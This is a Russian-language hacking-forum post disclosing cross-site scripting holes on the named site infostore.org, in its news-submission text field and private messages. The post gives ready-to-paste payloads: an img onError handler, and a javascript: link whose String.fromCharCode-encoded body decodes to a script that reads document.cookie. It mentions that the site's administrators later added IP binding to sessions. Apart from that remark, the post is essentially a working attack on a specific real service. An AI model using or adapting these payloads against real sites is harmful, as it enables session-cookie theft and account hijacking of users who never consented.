|
Познающий
Регистрация: 10.02.2007
Сообщений: 38
Провел на форуме:
1223241
Репутация:
183
|
|
Активная XSS на infostore.org
На момент описания уязвимости, на infostore Администрацией были приняты меры, и включена привязка к IP адресу.
.................................................. .......................
Уязвимость существует из-за недостаточной фильтрации входных данных в поле " текст:"
при добавлении новости пользователем, и в личных сообщениях.
В поле " текст:" пишем следующие:
Код:
<img src="a"onError=javascript:alert('XSS');>
Также, еще была найдена пассивная XSS
Код:
<a href="javascript:String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62)">XSS</a>
.................................................. .......................
______________________________________________
*****************************************
|